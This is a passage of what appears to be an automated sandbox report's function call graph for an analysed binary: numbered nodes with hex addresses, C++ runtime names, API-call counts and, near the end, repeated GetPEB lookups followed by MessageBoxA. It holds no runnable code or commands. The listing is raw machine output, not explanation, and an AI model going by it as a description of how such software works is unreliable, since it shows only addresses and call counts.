32566->32567 32568 401fb3 ctype 37 API calls 32567->32568 32569 4040e8 std::runtime_error::~runtime_error 32568->32569 32570 403be3 37 API calls 32569->32570 32571 404107 32570->32571 32572 401fb3 ctype 37 API calls 32571->32572 32573 404119 std::runtime_error::~runtime_error 32572->32573 32574 403be3 37 API calls 32573->32574 32575 404138 32574->32575 32576 401fb3 ctype 37 API calls 32575->32576 32577 40414a std::runtime_error::~runtime_error 32576->32577 32578 403be3 37 API calls 32577->32578 32579 404169 32578->32579 32580 401fb3 ctype 37 API calls 32579->32580 32581 40417b std::runtime_error::~runtime_error 32580->32581 32582 403be3 37 API calls 32581->32582 32583 40419a 32582->32583 32584 401fb3 ctype 37 API calls 32583->32584 32585 4041ac std::runtime_error::~runtime_error 32584->32585 32586 403be3 37 API calls 32585->32586 32587 4041cb 32586->32587 32588 401fb3 ctype 37 API calls 32587->32588 32589 4041dd std::runtime_error::~runtime_error 32588->32589 32590 403be3 37 API calls 32589->32590 32591 4041fc 32590->32591 32592 401fb3 ctype 37 API calls 32591->32592 32593 40420e std::runtime_error::~runtime_error 32592->32593 32594 403be3 37 API calls 32593->32594 32595 40422d 32594->32595 32596 401fb3 ctype 37 API calls 32595->32596 32597 40423f std::runtime_error::~runtime_error 32596->32597 32598 403be3 37 API calls 32597->32598 32599 40425e 32598->32599 32600 401fb3 ctype 37 API calls 32599->32600 32601 404270 std::runtime_error::~runtime_error 32600->32601 32602 403be3 37 API calls 32601->32602 32603 40428f 32602->32603 32604 401fb3 ctype 37 API calls 32603->32604 32605 4042a1 std::runtime_error::~runtime_error 32604->32605 32606 403be3 37 API calls 32605->32606 32607 4042c0 32606->32607 32608 401fb3 ctype 37 API calls 32607->32608 32609 4042d2 std::runtime_error::~runtime_error 32608->32609 32610 403be3 37 API calls 32609->32610 32611 4042f1 32610->32611 32612 401fb3 ctype 37 API calls 32611->32612 32613 404303 std::runtime_error::~runtime_error 32612->32613 32614 403be3 37 API calls 32613->32614 32615 404322 32614->32615 32616 401fb3 ctype 37 API calls 32615->32616 32617 404334 std::runtime_error::~runtime_error 32616->32617 32618 403be3 37 API calls 32617->32618 32619 404353 32618->32619 32620 401fb3 ctype 37 API calls 32619->32620 32621 404365 std::runtime_error::~runtime_error 32620->32621 32622 403be3 37 API calls 32621->32622 32623 404384 32622->32623 32624 401fb3 ctype 37 API calls 32623->32624 32625 404396 std::runtime_error::~runtime_error 32624->32625 32626 403be3 37 API calls 32625->32626 32627 4043b5 32626->32627 32628 401fb3 ctype 37 API calls 32627->32628 32629 4043c7 std::runtime_error::~runtime_error 32628->32629 32630 403be3 37 API calls 32629->32630 32631 4043e6 32630->32631 32632 401fb3 ctype 37 API calls 32631->32632 32633 4043f8 std::runtime_error::~runtime_error 32632->32633 32634 403be3 37 API calls 32633->32634 32635 404417 32634->32635 32636 401fb3 ctype 37 API calls 32635->32636 32637 404429 std::runtime_error::~runtime_error 32636->32637 32638 403be3 37 API calls 32637->32638 32639 404448 32638->32639 32640 401fb3 ctype 37 API calls 32639->32640 32641 40445a std::runtime_error::~runtime_error 32640->32641 32642 403be3 37 API calls 32641->32642 32643 404479 32642->32643 32644 401fb3 ctype 37 API calls 32643->32644 32645 40448b std::runtime_error::~runtime_error 32644->32645 32646 403be3 37 API calls 32645->32646 32647 4044aa 32646->32647 32648 401fb3 ctype 37 API calls 32647->32648 32649 4044bc std::runtime_error::~runtime_error 32648->32649 32650 403be3 37 API calls 32649->32650 32651 4044db 32650->32651 32652 401fb3 ctype 37 API calls 32651->32652 32653 4044ed std::runtime_error::~runtime_error 32652->32653 32654 403be3 37 API calls 32653->32654 32655 40450c 32654->32655 32656 401fb3 ctype 37 API calls 32655->32656 32657 40451e std::runtime_error::~runtime_error 32656->32657 32658 403be3 37 API calls 32657->32658 32659 40453d 32658->32659 32660 401fb3 ctype 37 API calls 32659->32660 32661 40454f std::runtime_error::~runtime_error 32660->32661 32662 403be3 37 API calls 32661->32662 32663 40456e 32662->32663 32664 401fb3 ctype 37 API calls 32663->32664 32665 404580 std::runtime_error::~runtime_error 32664->32665 32666 403be3 37 API calls 32665->32666 32667 40459f 32666->32667 32668 401fb3 ctype 37 API calls 32667->32668 32669 4045b1 std::runtime_error::~runtime_error 32668->32669 32670 403be3 37 API calls 32669->32670 32671 4045d0 32670->32671 32672 401fb3 ctype 37 API calls 32671->32672 32673 4045e2 std::runtime_error::~runtime_error 32672->32673 32674 403be3 37 API calls 32673->32674 32675 404601 32674->32675 32676 401fb3 ctype 37 API calls 32675->32676 32677 404613 std::runtime_error::~runtime_error 32676->32677 32678 403be3 37 API calls 32677->32678 32679 404632 32678->32679 32680 401fb3 ctype 37 API calls 32679->32680 32681 404644 std::runtime_error::~runtime_error 32680->32681 32682 403be3 37 API calls 32681->32682 32683 404663 32682->32683 32684 401fb3 ctype 37 API calls 32683->32684 32685 404675 std::runtime_error::~runtime_error 32684->32685 32686 403be3 37 API calls 32685->32686 32687 404694 32686->32687 32688 401fb3 ctype 37 API calls 32687->32688 32689 4046a6 std::runtime_error::~runtime_error 32688->32689 32690 403be3 37 API calls 32689->32690 32691 4046c5 32690->32691 32692 401fb3 ctype 37 API calls 32691->32692 32693 4046d7 std::runtime_error::~runtime_error 32692->32693 32694 403be3 37 API calls 32693->32694 32695 4046f6 32694->32695 32696 401fb3 ctype 37 API calls 32695->32696 32697 404708 std::runtime_error::~runtime_error 32696->32697 32698 403be3 37 API calls 32697->32698 32699 404727 32698->32699 32700 401fb3 ctype 37 API calls 32699->32700 32701 404739 std::runtime_error::~runtime_error 32700->32701 32702 403be3 37 API calls 32701->32702 32703 404758 32702->32703 32704 401fb3 ctype 37 API calls 32703->32704 32705 40476a std::runtime_error::~runtime_error 32704->32705 32706 403be3 37 API calls 32705->32706 32707 404789 32706->32707 32708 401fb3 ctype 37 API calls 32707->32708 32709 40479b std::runtime_error::~runtime_error 32708->32709 32710 403be3 37 API calls 32709->32710 32711 4047ba 32710->32711 32712 401fb3 ctype 37 API calls 32711->32712 32713 4047cc std::runtime_error::~runtime_error 32712->32713 32714 403be3 37 API calls 32713->32714 32715 4047eb 32714->32715 32716 401fb3 ctype 37 API calls 32715->32716 32717 4047fd std::runtime_error::~runtime_error 32716->32717 32718 403be3 37 API calls 32717->32718 32719 40481c 32718->32719 32720 401fb3 ctype 37 API calls 32719->32720 32721 40482e std::runtime_error::~runtime_error 32720->32721 32722 403be3 37 API calls 32721->32722 32723 40484d 32722->32723 32724 401fb3 ctype 37 API calls 32723->32724 32725 40485f std::runtime_error::~runtime_error 32724->32725 32726 403be3 37 API calls 32725->32726 32727 40487e 32726->32727 32728 401fb3 ctype 37 API calls 32727->32728 32729 404890 std::runtime_error::~runtime_error 32728->32729 32730 403be3 37 API calls 32729->32730 32731 4048af 32730->32731 32732 401fb3 ctype 37 API calls 32731->32732 32733 4048c1 std::runtime_error::~runtime_error 32732->32733 32734 403be3 37 API calls 32733->32734 32735 4048e0 32734->32735 32736 401fb3 ctype 37 API calls 32735->32736 32737 4048f2 std::runtime_error::~runtime_error 32736->32737 32738 403be3 37 API calls 32737->32738 32739 404911 32738->32739 32740 401fb3 ctype 37 API calls 32739->32740 32741 404923 std::runtime_error::~runtime_error 32740->32741 32742 403be3 37 API calls 32741->32742 32743 404942 32742->32743 32744 401fb3 ctype 37 API calls 32743->32744 32745 404954 std::runtime_error::~runtime_error 32744->32745 32746 403be3 37 API calls 32745->32746 32747 404973 32746->32747 32748 401fb3 ctype 37 API calls 32747->32748 32749 404985 std::runtime_error::~runtime_error 32748->32749 32750 403be3 37 API calls 32749->32750 32751 4049a4 32750->32751 32752 401fb3 ctype 37 API calls 32751->32752 32753 4049b6 std::runtime_error::~runtime_error 32752->32753 32754 403be3 37 API calls 32753->32754 32755 4049d5 32754->32755 32756 401fb3 ctype 37 API calls 32755->32756 32757 4049e7 std::runtime_error::~runtime_error 32756->32757 32758 403be3 37 API calls 32757->32758 32759 404a06 32758->32759 32760 401fb3 ctype 37 API calls 32759->32760 32761 404a18 std::runtime_error::~runtime_error 32760->32761 32762 403be3 37 API calls 32761->32762 32763 404a37 32762->32763 32764 401fb3 ctype 37 API calls 32763->32764 32765 404a49 std::runtime_error::~runtime_error 32764->32765 32766 403be3 37 API calls 32765->32766 32767 404a68 32766->32767 32768 401fb3 ctype 37 API calls 32767->32768 32769 404a7a std::runtime_error::~runtime_error 32768->32769 32770 403be3 37 API calls 32769->32770 32771 404a99 32770->32771 32772 401fb3 ctype 37 API calls 32771->32772 32773 404aab std::runtime_error::~runtime_error 32772->32773 32774 403be3 37 API calls 32773->32774 32775 404aca 32774->32775 32776 401fb3 ctype 37 API calls 32775->32776 32777 404adc std::runtime_error::~runtime_error 32776->32777 32778 403be3 37 API calls 32777->32778 32779 404afb 32778->32779 32780 401fb3 ctype 37 API calls 32779->32780 32781 404b0d std::runtime_error::~runtime_error 32780->32781 32782 403be3 37 API calls 32781->32782 32783 404b2c 32782->32783 32784 401fb3 ctype 37 API calls 32783->32784 32785 404b3e std::runtime_error::~runtime_error 32784->32785 32786 403be3 37 API calls 32785->32786 32787 404b5d 32786->32787 32788 401fb3 ctype 37 API calls 32787->32788 32789 404b6f std::runtime_error::~runtime_error 32788->32789 32790 403be3 37 API calls 32789->32790 32791 404b8e 32790->32791 32792 401fb3 ctype 37 API calls 32791->32792 32793 404ba0 std::runtime_error::~runtime_error 32792->32793 32794 403be3 37 API calls 32793->32794 32795 404bbf 32794->32795 32796 401fb3 ctype 37 API calls 32795->32796 32797 404bd1 std::runtime_error::~runtime_error 32796->32797 32798 403be3 37 API calls 32797->32798 32799 404bf0 32798->32799 32800 401fb3 ctype 37 API calls 32799->32800 32801 404c02 std::runtime_error::~runtime_error 32800->32801 32802 403be3 37 API calls 32801->32802 32803 404c21 32802->32803 32804 401fb3 ctype 37 API calls 32803->32804 32805 404c33 std::runtime_error::~runtime_error 32804->32805 32806 403be3 37 API calls 32805->32806 32807 404c52 32806->32807 32808 401fb3 ctype 37 API calls 32807->32808 32809 404c64 std::runtime_error::~runtime_error 32808->32809 32810 403be3 37 API calls 32809->32810 32811 404c83 32810->32811 32812 401fb3 ctype 37 API calls 32811->32812 32813 404c95 std::runtime_error::~runtime_error 32812->32813 32814 403be3 37 API calls 32813->32814 32815 404cb4 32814->32815 32816 401fb3 ctype 37 API calls 32815->32816 32817 404cc6 std::runtime_error::~runtime_error 32816->32817 32818 403be3 37 API calls 32817->32818 32819 404ce5 32818->32819 32820 401fb3 ctype 37 API calls 32819->32820 32821 404cf7 std::runtime_error::~runtime_error 32820->32821 32822 403be3 37 API calls 32821->32822 32823 404d16 32822->32823 32824 401fb3 ctype 37 API calls 32823->32824 32825 404d28 std::runtime_error::~runtime_error 32824->32825 32826 403be3 37 API calls 32825->32826 32827 404d47 32826->32827 32828 401fb3 ctype 37 API calls 32827->32828 32829 404d59 std::runtime_error::~runtime_error 32828->32829 32830 403be3 37 API calls 32829->32830 32831 404d78 32830->32831 32832 401fb3 ctype 37 API calls 32831->32832 32833 404d8a std::runtime_error::~runtime_error 32832->32833 32834 403be3 37 API calls 32833->32834 32835 404da9 32834->32835 32836 401fb3 ctype 37 API calls 32835->32836 32837 404dbb std::runtime_error::~runtime_error 32836->32837 32838 403be3 37 API calls 32837->32838 32839 404dda 32838->32839 32840 401fb3 ctype 37 API calls 32839->32840 32841 404dec std::runtime_error::~runtime_error 32840->32841 32842 403be3 37 API calls 32841->32842 32843 404e0b 32842->32843 32844 401fb3 ctype 37 API calls 32843->32844 32845 404e1d std::runtime_error::~runtime_error 32844->32845 32846 403be3 37 API calls 32845->32846 32847 404e3c 32846->32847 32848 401fb3 ctype 37 API calls 32847->32848 32849 404e4e std::runtime_error::~runtime_error 32848->32849 32850 403be3 37 API calls 32849->32850 32851 404e6d 32850->32851 32852 401fb3 ctype 37 API calls 32851->32852 32853 404e7f std::runtime_error::~runtime_error 32852->32853 32854 403be3 37 API calls 32853->32854 32855 404e9e 32854->32855 32856 401fb3 ctype 37 API calls 32855->32856 32857 404eb0 std::runtime_error::~runtime_error 32856->32857 32858 403be3 37 API calls 32857->32858 32859 404ecf 32858->32859 32860 401fb3 ctype 37 API calls 32859->32860 32861 404ee1 std::runtime_error::~runtime_error 32860->32861 32862 403be3 37 API calls 32861->32862 32863 404f00 32862->32863 32864 401fb3 ctype 37 API calls 32863->32864 32865 404f12 std::runtime_error::~runtime_error 32864->32865 32866 403be3 37 API calls 32865->32866 32867 404f31 32866->32867 32868 401fb3 ctype 37 API calls 32867->32868 32869 404f43 std::runtime_error::~runtime_error 32868->32869 32870 403be3 37 API calls 32869->32870 32871 404f62 32870->32871 32872 401fb3 ctype 37 API calls 32871->32872 32873 404f74 std::runtime_error::~runtime_error 32872->32873 32874 403be3 37 API calls 32873->32874 32875 404f93 32874->32875 32876 401fb3 ctype 37 API calls 32875->32876 32877 404fa5 std::runtime_error::~runtime_error 32876->32877 32878 403be3 37 API calls 32877->32878 32879 404fc4 32878->32879 32880 401fb3 ctype 37 API calls 32879->32880 32881 404fd6 std::runtime_error::~runtime_error 32880->32881 32882 403be3 37 API calls 32881->32882 32883 404ff5 32882->32883 32884 401fb3 ctype 37 API calls 32883->32884 32885 405007 std::runtime_error::~runtime_error 32884->32885 32886 403be3 37 API calls 32885->32886 32887 405026 32886->32887 32888 401fb3 ctype 37 API calls 32887->32888 32889 405038 std::runtime_error::~runtime_error 32888->32889 32890 403be3 37 API calls 32889->32890 32891 405057 32890->32891 32892 401fb3 ctype 37 API calls 32891->32892 32893 405069 std::runtime_error::~runtime_error 32892->32893 32894 403be3 37 API calls 32893->32894 32895 405088 32894->32895 32896 401fb3 ctype 37 API calls 32895->32896 32897 40509a std::runtime_error::~runtime_error 32896->32897 32898 403be3 37 API calls 32897->32898 32899 4050b9 32898->32899 32900 401fb3 ctype 37 API calls 32899->32900 32901 4050cb std::runtime_error::~runtime_error 32900->32901 32902 403be3 37 API calls 32901->32902 32903 4050ea 32902->32903 32904 401fb3 ctype 37 API calls 32903->32904 32905 4050fc std::runtime_error::~runtime_error 32904->32905 32906 403be3 37 API calls 32905->32906 32907 40511b 32906->32907 32908 401fb3 ctype 37 API calls 32907->32908 32909 40512d std::runtime_error::~runtime_error 32908->32909 32910 403be3 37 API calls 32909->32910 32911 40514c 32910->32911 32912 401fb3 ctype 37 API calls 32911->32912 32913 40515e std::runtime_error::~runtime_error 32912->32913 32914 403be3 37 API calls 32913->32914 32915 40517d 32914->32915 32916 401fb3 ctype 37 API calls 32915->32916 32917 40518f std::runtime_error::~runtime_error 32916->32917 32918 403be3 37 API calls 32917->32918 32919 4051ae 32918->32919 32920 401fb3 ctype 37 API calls 32919->32920 32921 4051c0 std::runtime_error::~runtime_error 32920->32921 32922 403be3 37 API calls 32921->32922 32923 4051df 32922->32923 32924 401fb3 ctype 37 API calls 32923->32924 32925 4051f1 std::runtime_error::~runtime_error 32924->32925 32926 403be3 37 API calls 32925->32926 32927 405210 32926->32927 32928 401fb3 ctype 37 API calls 32927->32928 32929 405222 std::runtime_error::~runtime_error 32928->32929 32930 403be3 37 API calls 32929->32930 32931 405241 32930->32931 32932 401fb3 ctype 37 API calls 32931->32932 32933 405253 std::runtime_error::~runtime_error 32932->32933 32934 403be3 37 API calls 32933->32934 32935 405272 32934->32935 32936 401fb3 ctype 37 API calls 32935->32936 32937 405284 std::runtime_error::~runtime_error 32936->32937 32938 403be3 37 API calls 32937->32938 32939 4052a3 32938->32939 32940 401fb3 ctype 37 API calls 32939->32940 32941 4052b5 std::runtime_error::~runtime_error 32940->32941 32942 403be3 37 API calls 32941->32942 32943 4052d4 32942->32943 32944 401fb3 ctype 37 API calls 32943->32944 32945 4052e6 std::runtime_error::~runtime_error 32944->32945 32946 403be3 37 API calls 32945->32946 32947 405305 32946->32947 32948 401fb3 ctype 37 API calls 32947->32948 32949 405317 std::runtime_error::~runtime_error 32948->32949 32950 403be3 37 API calls 32949->32950 32951 405336 32950->32951 32952 401fb3 ctype 37 API calls 32951->32952 32953 405348 std::runtime_error::~runtime_error 32952->32953 32954 403be3 37 API calls 32953->32954 32955 405367 32954->32955 32956 401fb3 ctype 37 API calls 32955->32956 32957 405379 std::runtime_error::~runtime_error 32956->32957 32958 403be3 37 API calls 32957->32958 32959 405398 32958->32959 32960 401fb3 ctype 37 API calls 32959->32960 32961 4053aa std::runtime_error::~runtime_error 32960->32961 32962 403be3 37 API calls 32961->32962 32963 4053c9 32962->32963 32964 401fb3 ctype 37 API calls 32963->32964 32965 4053db std::runtime_error::~runtime_error 32964->32965 32966 403be3 37 API calls 32965->32966 32967 4053fa 32966->32967 32968 401fb3 ctype 37 API calls 32967->32968 32969 40540c std::runtime_error::~runtime_error 32968->32969 32970 403be3 37 API calls 32969->32970 32971 40542b 32970->32971 32972 401fb3 ctype 37 API calls 32971->32972 32973 40543d std::runtime_error::~runtime_error 32972->32973 32974 403be3 37 API calls 32973->32974 32975 40545c 32974->32975 32976 401fb3 ctype 37 API calls 32975->32976 32977 40546e std::runtime_error::~runtime_error 32976->32977 32978 403be3 37 API calls 32977->32978 32979 40548d 32978->32979 32980 401fb3 ctype 37 API calls 32979->32980 32981 40549f std::runtime_error::~runtime_error 32980->32981 32982 403be3 37 API calls 32981->32982 32983 4054be 32982->32983 32984 401fb3 ctype 37 API calls 32983->32984 32985 4054d0 std::runtime_error::~runtime_error 32984->32985 32986 403be3 37 API calls 32985->32986 32987 4054ef 32986->32987 32988 401fb3 ctype 37 API calls 32987->32988 32989 405501 std::runtime_error::~runtime_error 32988->32989 32990 403be3 37 API calls 32989->32990 32991 405520 32990->32991 32992 401fb3 ctype 37 API calls 32991->32992 32993 405532 std::runtime_error::~runtime_error 32992->32993 32994 403be3 37 API calls 32993->32994 32995 405551 32994->32995 32996 401fb3 ctype 37 API calls 32995->32996 32997 405563 std::runtime_error::~runtime_error 32996->32997 32998 403be3 37 API calls 32997->32998 32999 405582 32998->32999 33000 401fb3 ctype 37 API calls 32999->33000 33001 405594 std::runtime_error::~runtime_error 33000->33001 33002 403be3 37 API calls 33001->33002 33003 4055b3 33002->33003 33004 401fb3 ctype 37 API calls 33003->33004 33005 4055c5 std::runtime_error::~runtime_error 33004->33005 33006 403be3 37 API calls 33005->33006 33007 4055e4 33006->33007 33008 401fb3 ctype 37 API calls 33007->33008 33009 4055f6 std::runtime_error::~runtime_error 33008->33009 33010 403be3 37 API calls 33009->33010 33011 405615 33010->33011 33012 401fb3 ctype 37 API calls 33011->33012 33013 405627 std::runtime_error::~runtime_error 33012->33013 33014 403be3 37 API calls 33013->33014 33015 405646 33014->33015 33016 401fb3 ctype 37 API calls 33015->33016 33017 405658 std::runtime_error::~runtime_error 33016->33017 33018 403be3 37 API calls 33017->33018 33019 405677 33018->33019 33020 401fb3 ctype 37 API calls 33019->33020 33021 405689 std::runtime_error::~runtime_error 33020->33021 33022 403be3 37 API calls 33021->33022 33023 4056a8 33022->33023 33024 401fb3 ctype 37 API calls 33023->33024 33025 4056ba std::runtime_error::~runtime_error 33024->33025 33026 403be3 37 API calls 33025->33026 33027 4056d9 33026->33027 33028 401fb3 ctype 37 API calls 33027->33028 33029 4056eb std::runtime_error::~runtime_error 33028->33029 33030 403be3 37 API calls 33029->33030 33031 40570a 33030->33031 33032 401fb3 ctype 37 API calls 33031->33032 33033 40571c std::runtime_error::~runtime_error 33032->33033 33034 403be3 37 API calls 33033->33034 33035 40573b 33034->33035 33036 401fb3 ctype 37 API calls 33035->33036 33037 40574d std::runtime_error::~runtime_error 33036->33037 33038 403be3 37 API calls 33037->33038 33039 40576c 33038->33039 33040 401fb3 ctype 37 API calls 33039->33040 33041 40577e std::runtime_error::~runtime_error 33040->33041 33042 403be3 37 API calls 33041->33042 33043 40579d 33042->33043 33044 401fb3 ctype 37 API calls 33043->33044 33045 4057af std::runtime_error::~runtime_error 33044->33045 33046 403be3 37 API calls 33045->33046 33047 4057ce 33046->33047 33048 401fb3 ctype 37 API calls 33047->33048 33049 4057e0 std::runtime_error::~runtime_error 33048->33049 33050 403be3 37 API calls 33049->33050 33051 4057ff 33050->33051 33052 401fb3 ctype 37 API calls 33051->33052 33053 405811 std::runtime_error::~runtime_error 33052->33053 33054 403be3 37 API calls 33053->33054 33055 405830 33054->33055 33056 401fb3 ctype 37 API calls 33055->33056 33057 405842 std::runtime_error::~runtime_error 33056->33057 33058 403be3 37 API calls 33057->33058 33059 405861 33058->33059 33060 401fb3 ctype 37 API calls 33059->33060 33061 405873 std::runtime_error::~runtime_error 33060->33061 33062 403be3 37 API calls 33061->33062 33063 405892 33062->33063 33064 401fb3 ctype 37 API calls 33063->33064 33065 4058a4 std::runtime_error::~runtime_error 33064->33065 33066 403be3 37 API calls 33065->33066 33067 4058c3 33066->33067 33068 401fb3 ctype 37 API calls 33067->33068 33069 4058d5 std::runtime_error::~runtime_error 33068->33069 33070 403be3 37 API calls 33069->33070 33071 4058f4 33070->33071 33072 401fb3 ctype 37 API calls 33071->33072 33073 405906 std::runtime_error::~runtime_error 33072->33073 33074 403be3 37 API calls 33073->33074 33075 405925 33074->33075 33076 401fb3 ctype 37 API calls 33075->33076 33077 405937 std::runtime_error::~runtime_error 33076->33077 33078 403be3 37 API calls 33077->33078 33079 405956 33078->33079 33080 401fb3 ctype 37 API calls 33079->33080 33081 405968 std::runtime_error::~runtime_error 33080->33081 33082 403be3 37 API calls 33081->33082 33083 405987 33082->33083 33084 401fb3 ctype 37 API calls 33083->33084 33085 405999 std::runtime_error::~runtime_error 33084->33085 33086 403be3 37 API calls 33085->33086 33087 4059b8 33086->33087 33088 401fb3 ctype 37 API calls 33087->33088 33089 4059ca std::runtime_error::~runtime_error 33088->33089 33090 403be3 37 API calls 33089->33090 33091 4059e9 33090->33091 33092 401fb3 ctype 37 API calls 33091->33092 33093 4059fb std::runtime_error::~runtime_error 33092->33093 33094 403be3 37 API calls 33093->33094 33095 405a1a 33094->33095 33096 401fb3 ctype 37 API calls 33095->33096 33097 405a2c std::runtime_error::~runtime_error 33096->33097 33098 403be3 37 API calls 33097->33098 33099 405a4b 33098->33099 33100 401fb3 ctype 37 API calls 33099->33100 33101 405a5d std::runtime_error::~runtime_error 33100->33101 33102 403be3 37 API calls 33101->33102 33103 405a7c 33102->33103 33104 401fb3 ctype 37 API calls 33103->33104 33105 405a8e std::runtime_error::~runtime_error 33104->33105 33106 403be3 37 API calls 33105->33106 33107 405aad 33106->33107 33108 401fb3 ctype 37 API calls 33107->33108 33109 405abf std::runtime_error::~runtime_error 33108->33109 33110 403be3 37 API calls 33109->33110 33111 405ade 33110->33111 33112 401fb3 ctype 37 API calls 33111->33112 33113 405af0 std::runtime_error::~runtime_error 33112->33113 33114 403be3 37 API calls 33113->33114 33115 405b0f 33114->33115 33116 401fb3 ctype 37 API calls 33115->33116 33117 405b21 std::runtime_error::~runtime_error 33116->33117 33118 403be3 37 API calls 33117->33118 33119 405b40 33118->33119 33120 401fb3 ctype 37 API calls 33119->33120 33121 405b52 std::runtime_error::~runtime_error 33120->33121 33122 403be3 37 API calls 33121->33122 33123 405b71 33122->33123 33124 401fb3 ctype 37 API calls 33123->33124 33125 405b83 std::runtime_error::~runtime_error 33124->33125 33126 403be3 37 API calls 33125->33126 33127 405ba2 33126->33127 33128 401fb3 ctype 37 API calls 33127->33128 33129 405bb4 std::runtime_error::~runtime_error 33128->33129 33130 403be3 37 API calls 33129->33130 33131 405bd3 33130->33131 33132 401fb3 ctype 37 API calls 33131->33132 33133 405be5 std::runtime_error::~runtime_error 33132->33133 33134 403be3 37 API calls 33133->33134 33135 405c04 33134->33135 33136 401fb3 ctype 37 API calls 33135->33136 33137 405c16 std::runtime_error::~runtime_error 33136->33137 33138 403be3 37 API calls 33137->33138 33139 405c35 33138->33139 33140 401fb3 ctype 37 API calls 33139->33140 33141 405c47 std::runtime_error::~runtime_error 33140->33141 33142 403be3 37 API calls 33141->33142 33143 405c66 33142->33143 33144 401fb3 ctype 37 API calls 33143->33144 33145 405c78 std::runtime_error::~runtime_error 33144->33145 33146 403be3 37 API calls 33145->33146 33147 405c97 33146->33147 33148 401fb3 ctype 37 API calls 33147->33148 33149 405ca9 std::runtime_error::~runtime_error 33148->33149 33150 403be3 37 API calls 33149->33150 33151 405cc8 33150->33151 33152 401fb3 ctype 37 API calls 33151->33152 33153 405cda std::runtime_error::~runtime_error 33152->33153 33154 403be3 37 API calls 33153->33154 33155 405cf9 33154->33155 33156 401fb3 ctype 37 API calls 33155->33156 33157 405d0b std::runtime_error::~runtime_error 33156->33157 33158 403be3 37 API calls 33157->33158 33159 405d2a 33158->33159 33160 401fb3 ctype 37 API calls 33159->33160 33161 405d3c std::runtime_error::~runtime_error 33160->33161 33162 403be3 37 API calls 33161->33162 33163 405d5b 33162->33163 33164 401fb3 ctype 37 API calls 33163->33164 33165 405d6d std::runtime_error::~runtime_error 33164->33165 33166 403be3 37 API calls 33165->33166 33167 405d8c 33166->33167 33168 401fb3 ctype 37 API calls 33167->33168 33169 405d9e std::runtime_error::~runtime_error 33168->33169 33170 403be3 37 API calls 33169->33170 33171 405dbd 33170->33171 33172 401fb3 ctype 37 API calls 33171->33172 33173 405dcf std::runtime_error::~runtime_error 33172->33173 33174 403be3 37 API calls 33173->33174 33175 405dee 33174->33175 33176 401fb3 ctype 37 API calls 33175->33176 33177 405e00 std::runtime_error::~runtime_error 33176->33177 33178 403be3 37 API calls 33177->33178 33179 405e1f 33178->33179 33180 401fb3 ctype 37 API calls 33179->33180 33181 405e31 std::runtime_error::~runtime_error 33180->33181 33182 403be3 37 API calls 33181->33182 33183 405e50 33182->33183 33184 401fb3 ctype 37 API calls 33183->33184 33185 405e62 std::runtime_error::~runtime_error 33184->33185 33186 403be3 37 API calls 33185->33186 33187 405e81 33186->33187 33188 401fb3 ctype 37 API calls 33187->33188 33189 405e93 std::runtime_error::~runtime_error 33188->33189 33190 403be3 37 API calls 33189->33190 33191 405eb2 33190->33191 33192 401fb3 ctype 37 API calls 33191->33192 33193 405ec4 std::runtime_error::~runtime_error 33192->33193 33194 403be3 37 API calls 33193->33194 33195 405ee3 33194->33195 33196 401fb3 ctype 37 API calls 33195->33196 33197 405ef5 std::runtime_error::~runtime_error 33196->33197 33198 403be3 37 API calls 33197->33198 33199 405f14 33198->33199 33200 401fb3 ctype 37 API calls 33199->33200 33201 405f26 std::runtime_error::~runtime_error 33200->33201 33202 401784 38 API calls 33201->33202 33203 405f56 33202->33203 33204 405f7f std::runtime_error::~runtime_error 33203->33204 33272 40215a 33203->33272 33204->32349 33208->32352 33209->32356 33210->32359 33211->32363 33215 41221b 33212->33215 33216 412244 33215->33216 33218 412222 __getbuf 33215->33218 33216->32453 33218->33216 33219 4121a0 33218->33219 33221 4121ac std::_Locinfo::_Getctype 33219->33221 33220 4121df 33222 4121fa RtlAllocateHeap 33220->33222 33224 412209 std::_Locinfo::_Getctype 33220->33224 33221->33220 33229 4148f8 36 API calls __lock 33221->33229 33222->33224 33224->33218 33225 4121c7 33230 4151bb 5 API calls __getbuf 33225->33230 33227 4121d2 33231 412212 LeaveCriticalSection std::_Locinfo::_Getctype 33227->33231 33229->33225 33230->33227 33231->33220 33233 401d38 __EH_prolog _strlen 33232->33233 35170 401a1e 33233->35170 33235 401d72 33240 401d7c 33235->33240 33242 401dc2 33235->33242 35186 401939 33235->35186 35176 40191e 33240->35176 33242->33240 33243 401939 49 API calls 33242->33243 33243->33242 33244 402141 35260 401f0d 33244->35260 33247 40199c 37 API calls 33248 402156 33247->33248 33248->32461 33250 403bb5 _strlen 33249->33250 35270 402042 33250->35270 33252 403bc2 33253 403be3 33252->33253 33254 403bed __EH_prolog 33253->33254 35289 403b83 33254->35289 33259 403b83 ctype 37 API calls 33260 403c16 std::runtime_error::~runtime_error 33259->33260 33260->32465 33262 401fc6 33261->33262 33263 401fcb 33261->33263 35308 420531 37 API calls 2 library calls 33262->35308 33265 401fe1 33263->33265 33266 401ff9 33263->33266 35309 401a7a 37 API calls 3 library calls 33265->35309 33268 401cd0 ctype 37 API calls 33266->33268 33271 401ff7 std::runtime_error::~runtime_error std::_Locinfo::_Getctype 33268->33271 33269 401feb 35310 401a7a 37 API calls 3 library calls 33269->35310 33271->32467 35311 401693 GetPEB 33272->35311 33275 401693 59 API calls 33276 402186 33275->33276 33277 401693 59 API calls 33276->33277 33278 402193 33277->33278 33279 401693 59 API calls 33278->33279 33280 4021a0 33279->33280 33281 401693 59 API calls 33280->33281 33282 4021ac 33281->33282 33283 401693 59 API calls 33282->33283 33284 4021b9 33283->33284 33285 401693 59 API calls 33284->33285 33286 4021c6 33285->33286 33287 401693 59 API calls 33286->33287 33291 4021d3 33287->33291 33288 4021e4 33289 401d2e 51 API calls 33288->33289 33288->33291 33295 402801 MessageBoxA 33288->33295 33290 402221 33289->33290 33292 402141 51 API calls 33290->33292 33291->33288 33293 402227 33292->33293 33294 401d2e 51 API calls 33293->33294 33296 40222e 33294->33296 33295->33204 33297 402141 51 API calls 33296->33297 33298 402234 33297->33298 33299 401d2e 51 API calls 33298->33299 33300 40223b 33299->33300 33301 402141 51 API calls 33300->33301 33302 402241 33301->33302 33303 401d2e 51 API calls 33302->33303 33304 402248 33303->33304 33305 402141 51 API calls 33304->33305 33306 40224e 33305->33306 33307 401d2e 51 API calls 33306->33307 33308 402255 33307->33308 33309 402141 51 API calls 33308->33309 33310 40225b 33309->33310 33311 401d2e 51 API calls 33310->33311 33312 402262 33311->33312 33313 402141 51 API calls 33312->33313 33314 40226b 33313->33314 33315 401d2e 51 API calls 33314->33315 33316 402272 33315->33316 33317 402141 51 API calls 33316->33317 33318 402278 33317->33318 33319 401d2e 51 API calls 33318->33319 33320 40227f 33319->33320 33321 402141 51 API calls 